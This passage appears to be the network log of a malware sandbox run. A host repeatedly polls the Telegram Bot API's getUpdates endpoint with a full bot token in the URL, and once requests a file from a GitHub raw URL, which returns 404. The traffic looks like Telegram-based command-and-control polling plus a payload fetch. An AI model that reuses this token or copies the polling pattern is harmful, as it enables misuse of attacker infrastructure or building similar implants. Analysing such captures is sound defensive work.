2024-09-02 14:51:51 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	56264	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:50 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:51 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:51 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	56266	185.199.108.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:51 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-09-02 14:51:51 UTC	804	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 6AE5:37B4DD:13F9E6B:1669555:66D5D107 Accept-Ranges: bytes Date: Mon, 02 Sep 2024 14:51:51 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740038-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1725288711.428111,VS0,VE9 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 99a520c9c5e293096a1acd5571badf6688b74ee3 Expires: Mon, 02 Sep 2024 14:56:51 GMT Source-Age: 0
2024-09-02 14:51:51 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	56268	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:52 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:52 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:53 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	56267	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:52 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:52 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:53 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.5	56270	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:54 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:54 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:54 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.5	56269	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:54 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:54 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:54 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.5	56272	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:56 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:56 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:56 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.5	56271	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:56 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:56 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:56 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.5	56273	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:58 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:58 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:58 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	56274	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:58 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:58 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:58 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	56275	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:52:00 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:52:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:52:00 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:52:00 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.5	56276	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:52:00 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:52:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:52:00 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:52:00 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.5	56277	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:52:02 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:52:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:52:02 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:52:02 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.5	56278	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:52:02 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
